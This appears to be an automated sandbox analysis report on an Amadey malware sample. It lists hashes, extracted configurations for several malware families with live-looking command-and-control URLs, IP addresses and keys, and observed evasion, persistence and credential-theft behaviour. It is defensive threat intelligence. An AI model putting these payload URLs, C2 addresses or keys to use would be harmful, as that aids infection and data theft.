amadey | 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288

Analysis

max time kernel
119s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 23:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
Size

938KB
MD5

5a97dfa3080fd5ff60f22c76d10151aa
SHA1

ae3c5b370fdc8e87ecf3f7ce53c9de85033a8904
SHA256

19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
SHA512

a9a7552369cc727a67b21e521db17c6d7f58d46abf3151ef2fe7ff4d796a5980a3e7c83ba4344481dcdc61da6fb04a095f43456827832661e9bdf4763b2a7fed
SSDEEP

24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a07u:TTvC/MTQYxsWR7a07

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

http://185.208.156.162/page.php

Attributes

key
v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

xworm

Version

5.0

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes

Install_directory
%AppData%
install_file
google_updates.exe

aes.plain

Extracted

Family

systembc

towerbingobongoboom.com

62.60.226.86

Attributes

dns
5.132.191.104

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023e0b-259.dat	family_xworm
behavioral2/memory/1372-270-0x00000000007F0000-0x0000000000800000-memory.dmp	family_xworm

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/5232-937-0x0000000000830000-0x0000000000C88000-memory.dmp	healer
behavioral2/memory/5232-961-0x0000000000830000-0x0000000000C88000-memory.dmp	healer
behavioral2/memory/5232-1105-0x0000000000830000-0x0000000000C88000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
LiteHTTP
LiteHTTP is an open-source bot written in C#.
stealer bot litehttp
Litehttp family
litehttp
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	feda7c9ffa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	035c4d64c6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	wtrpqgw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b7df62c2f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	03eec02af1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1a8233e8ee.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4abf414f45.exe

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/4384-473-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-482-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-474-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-486-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-488-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-487-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-485-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-489-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-512-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig
behavioral2/memory/4384-582-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
30	2096	powershell.exe
64	2056	powershell.exe
71	1588	powershell.exe
87	3068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2096	powershell.exe
2056	powershell.exe
1588	powershell.exe
3068	powershell.exe
2056	powershell.exe
3924	powershell.exe
2180	powershell.exe
1608	powershell.exe
4024	powershell.exe
3944	powershell.exe

Downloads MZ/PE file 14 IoCs

flow	pid	Process
102	4408	BitLockerToGo.exe
69	3580	Gxtuum.exe
71	1588	powershell.exe
41	5068	rapes.exe
41	5068	rapes.exe
41	5068	rapes.exe
41	5068	rapes.exe
41	5068	rapes.exe
41	5068	rapes.exe
41	5068	rapes.exe
130	2416	BitLockerToGo.exe
30	2096	powershell.exe
87	3068	powershell.exe
140	2312	4abf414f45.exe

Checks BIOS information in registry 2 TTPs 30 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4abf414f45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4abf414f45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	035c4d64c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1a8233e8ee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wtrpqgw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b7df62c2f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	03eec02af1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1a8233e8ee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	035c4d64c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wtrpqgw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	feda7c9ffa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	feda7c9ffa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	03eec02af1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b7df62c2f.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	PcAIvJ0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	nhDLtPT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk	cnntXtU.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk	cnntXtU.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs	powershell.exe

Executes dropped EXE 27 IoCs

pid	Process
2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
5068	rapes.exe
968	rapes.exe
2184	SvhQA35.exe
3452	chromium.exe
4860	ce4pMzk.exe
1724	PcAIvJ0.exe
644	nhDLtPT.exe
3580	Gxtuum.exe
1372	cnntXtU.exe
2400	vertualiziren.exe
2256	99878a5969.exe
2128	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
4408	rapes.exe
4924	wtrpqgw.exe
1720	Gxtuum.exe
1820	2b7df62c2f.exe
4848	483d2fa8a0d53818306efeb32d3.exe
3836	5106e5bbdb.exe
428	5106e5bbdb.exe
2856	feda7c9ffa.exe
2232	03eec02af1.exe
2312	4abf414f45.exe
3352	035c4d64c6.exe
1612	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
4116	a6f3c10671.exe
5232	1a8233e8ee.exe

Identifies Wine through registry keys 2 TTPs 15 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	vertualiziren.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	4abf414f45.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	035c4d64c6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	2b7df62c2f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	03eec02af1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	1a8233e8ee.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	wtrpqgw.exe
Key opened	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine	feda7c9ffa.exe

Loads dropped DLL 47 IoCs

pid	Process
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe
3452	chromium.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe"	cnntXtU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\""	ce4pMzk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
83	pastebin.com
85	pastebin.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023e15-297.dat	autoit_exe
behavioral2/files/0x0008000000023e4d-648.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2264	tasklist.exe
3080	tasklist.exe
5956	tasklist.exe
5604	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

pid	Process
2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
5068	rapes.exe
968	rapes.exe
2400	vertualiziren.exe
2128	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
4408	rapes.exe
4924	wtrpqgw.exe
1820	2b7df62c2f.exe
4848	483d2fa8a0d53818306efeb32d3.exe
2856	feda7c9ffa.exe
2232	03eec02af1.exe
2312	4abf414f45.exe
3352	035c4d64c6.exe
1612	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
5232	1a8233e8ee.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3836 set thread context of 428	3836	5106e5bbdb.exe	165
PID 3368 set thread context of 4384	3368	Explorer.EXE	163
PID 1820 set thread context of 4408	1820	2b7df62c2f.exe	169
PID 2856 set thread context of 2416	2856	feda7c9ffa.exe	174

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe
File created	C:\Windows\Tasks\Test Task17.job	vertualiziren.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3688	3836	WerFault.exe	164

System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4abf414f45.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	a6f3c10671.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	03eec02af1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	035c4d64c6.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	a6f3c10671.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	99878a5969.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b7df62c2f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1a8233e8ee.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5106e5bbdb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5106e5bbdb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	feda7c9ffa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wtrpqgw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a6f3c10671.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2620	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4456	taskkill.exe
2944	taskkill.exe
388	taskkill.exe
4156	taskkill.exe
4588	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1208	schtasks.exe
1292	schtasks.exe
1452	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2096	powershell.exe
2096	powershell.exe
2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
5068	rapes.exe
5068	rapes.exe
968	rapes.exe
968	rapes.exe
4860	ce4pMzk.exe
4860	ce4pMzk.exe
4860	ce4pMzk.exe
4860	ce4pMzk.exe
4860	ce4pMzk.exe
2056	powershell.exe
2056	powershell.exe
2056	powershell.exe
2400	vertualiziren.exe
2400	vertualiziren.exe
1372	cnntXtU.exe
1372	cnntXtU.exe
1588	powershell.exe
1588	powershell.exe
1588	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe
2128	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
2128	TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
2180	powershell.exe
2180	powershell.exe
